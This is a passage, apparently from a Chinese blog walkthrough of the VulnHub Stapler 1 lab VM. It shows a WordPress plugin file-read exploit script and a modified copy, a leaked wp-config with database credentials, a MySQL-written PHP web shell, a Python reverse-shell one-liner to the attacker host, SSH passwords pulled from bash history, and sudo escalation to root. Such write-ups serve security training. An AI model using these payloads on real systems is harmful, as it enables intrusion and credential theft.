 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 | Found By: Rss Generator (Passive Detection)
 |  - https://192.168.56.122:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 |  - https://192.168.56.122:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
 | Location: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2019-12-08T00:00:00.000Z
 | Readme: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.4.4
 | Style URL: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon Apr 13 22:31:17 2020
[+] Requests Done: 2
[+] Cached Requests: 32
[+] Data Sent: 616 B
[+] Data Received: 1.095 KB
[+] Memory used: 194.785 MB
[+] Elapsed time: 00:00:03

getshell

访问

1	https://192.168.56.122:12380/blogblog/wp-content/plugins/

在eploitdb中搜索

root@kali:~# searchsploit wordpress advanced video
---------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                    |  Path
                                                                                  | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion                        | exploits/php/webapps/39646.py
---------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

查看exploit的内容

root@kali:~/vulnhub/stapler-1# cat /usr/share/exploitdb/exploits/php/webapps/39646.py
#!/usr/bin/env python

# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2

#       Timeline
#       03/24/2016 - Bug discovered
#       03/24/2016 - Initial notification of vendor
#       04/01/2016 - No answer from vendor, public release of bug 


# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:

#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);


# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

# Exploit - Print the content of wp-config.php in terminal (default Wordpress config)

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
        numbers = re.findall(r'\d+',line)
        id = numbers[-1]
        id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
        if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
                urls=re.findall('"(https?://.*?)"', line)
                print urllib2.urlopen(urls[0]).read()

修改poc中的ip和文件夹保存后运行poc，下面是修改后的poc脚本内容

import random
import urllib2
import re
import ssl

ssl._create_default_https_context = ssl._create_unverified_context
url = "https://192.168.56.122:12380/blogblog" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
	numbers = re.findall(r'\d+',line)
	id = numbers[-1]
	id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
	if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
		urls=re.findall('"(https?://.*?)"', line)
		print urllib2.urlopen(urls[0]).read()

运行poc后没有任何输出，但是在https://192.168.56.122:12380/blogblog/wp-content/uploads/目录下新增了一个957550172.jpeg文件，下载此文件并查看里面的内容

root@kali:~/vulnhub/stapler-1# cat 957550172.jpeg 
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);

找到mysql数据库的账号和密码：root/plbkac，接下来连接数据库

首先猜测网站绝对路径如下

MySQL [wordpress]> select load_file('/var/www/https/robots.txt');
+-------------------------------------------------------------+
| load_file('/var/www/https/robots.txt')                      |
+-------------------------------------------------------------+
| User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/
 |
+-------------------------------------------------------------+
1 row in set (0.001 sec)

使用以下myssql语句写入木马

1 2	MySQL [wordpress]> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php"; Query OK, 1 row affected (0.001 sec)

成功写入木马并能执行命令

1	https://192.168.56.122:12380/blogblog/wp-content/uploads/shell.php?cmd=id

现在执行下面命令来反弹一个shell

浏览器执行

https://192.168.56.122:12380/blogblog/wp-content/uploads/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",5566));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

kali端，成功的弹回了shell

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.122: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.122] 54522
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ pwd
/var/www/https/blogblog/wp-content/uploads
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/var/www/https/blogblog/wp-content/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@red:/var/www/https/blogblog/wp-content/uploads$ whoami
whoami
www-data

使用下面的命令尝试找出ssh的账号密码

www-data@red:/$ pwd
pwd
/
www-data@red:/$ find -name ".bash_history" -exec cat {} \; 2>/dev/null
find -name ".bash_history" -exec cat {} \; 2>/dev/null
...
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
...

发现下面两个账号密码均能成功登录

1 2	JKanode thisimypassword peter JZQuyIN5

root@kali:~# ssh JKanode@192.168.56.122
The authenticity of host '192.168.56.122 (192.168.56.122)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.122' (ECDSA) to the list of known hosts.
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
Enter passphrase for key '/root/.ssh/id_rsa': 
JKanode@192.168.56.122's password: 
Welcome back!



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

JKanode@red:~$ id
uid=1013(JKanode) gid=1013(JKanode) groups=1013(JKanode)
JKanode@red:~$ whoami
JKanode

root@kali:~# ssh peter@192.168.56.122
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
Enter passphrase for key '/root/.ssh/id_rsa': 
peter@192.168.56.122's password: 
Welcome back!

This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses ---
Aborting.
The function will be run again next time.  To prevent this, execute:
  touch ~/.zshrc
red%
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% whoami
peter

执行下面的命令利用peter用户提权

red% sudo usermod -s /bin/bash

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Usage: usermod [options] LOGIN

Options:
  -c, --comment COMMENT         new value of the GECOS field
  -d, --home HOME_DIR           new home directory for the user account
  -e, --expiredate EXPIRE_DATE  set account expiration date to EXPIRE_DATE
  -f, --inactive INACTIVE       set password inactive after expiration
                                to INACTIVE
  -g, --gid GROUP               force use GROUP as new primary group
  -G, --groups GROUPS           new list of supplementary GROUPS
  -a, --append                  append the user to the supplemental GROUPS
                                mentioned by the -G option without removing
                                him/her from other groups
  -h, --help                    display this help message and exit
  -l, --login NEW_LOGIN         new value of the login name
  -L, --lock                    lock the user account
  -m, --move-home               move contents of the home directory to the
                                new location (use only with -d)
  -o, --non-unique              allow using duplicate (non-unique) UID
  -p, --password PASSWORD       use encrypted password for the new password
  -R, --root CHROOT_DIR         directory to chroot into
  -s, --shell SHELL             new login shell for the user account
  -u, --uid UID                 new UID for the user account
  -U, --unlock                  unlock the user account
  -v, --add-subuids FIRST-LAST  add range of subordinate uids
  -V, --del-subuids FIRST-LAST  remove range of subordinate uids
  -w, --add-subgids FIRST-LAST  add range of subordinate gids
  -W, --del-subgids FIRST-LAST  remove range of subordinate gids
  -Z, --selinux-user SEUSER     new SELinux user mapping for the user account

red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% whoami
peter
red% sudo -i
➜  ~ id
uid=0(root) gid=0(root) groups=0(root)
➜  ~ whoami
root
➜  ~ cd /root
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

成功的获取到了root用户的权限并拿到了flag

其他方法

也可以访问wordpress数据库后然后选择用户john并破解hash值，它将是“不正确的”使用用户“john”和密码“incorrect”访问wordpress然后导航以添加插件，然后上传shell，将在/blogblog/wp-content/uploads目录中找到shell

使用nc作为侦听器建立连接之后，还可以使用下面的方法进行提权

提权参考1 Linux-UAF通过bpf-BPF-PROG-LOAD-错误路径中的double-fdput
提权参考2 Linux内核4.4.x-Ubuntu-16.04-double-fdput-bpf-BPF_PROG_LOAD-提权

其它更多方法请自行尝试。。。

知识点总结

wordpress用户枚举
WordPress Plugin Advanced Video 1.0 - 本地文件包含
python poc修改
select load_file(‘/var/www/https/robots.txt’); mysql语句读取文件内容
select “php木马内容” into outfile “/var/www/https/blogblog/wp-content/uploads/shell.php”; mysql语句写入木马
python脚本反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",5566));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'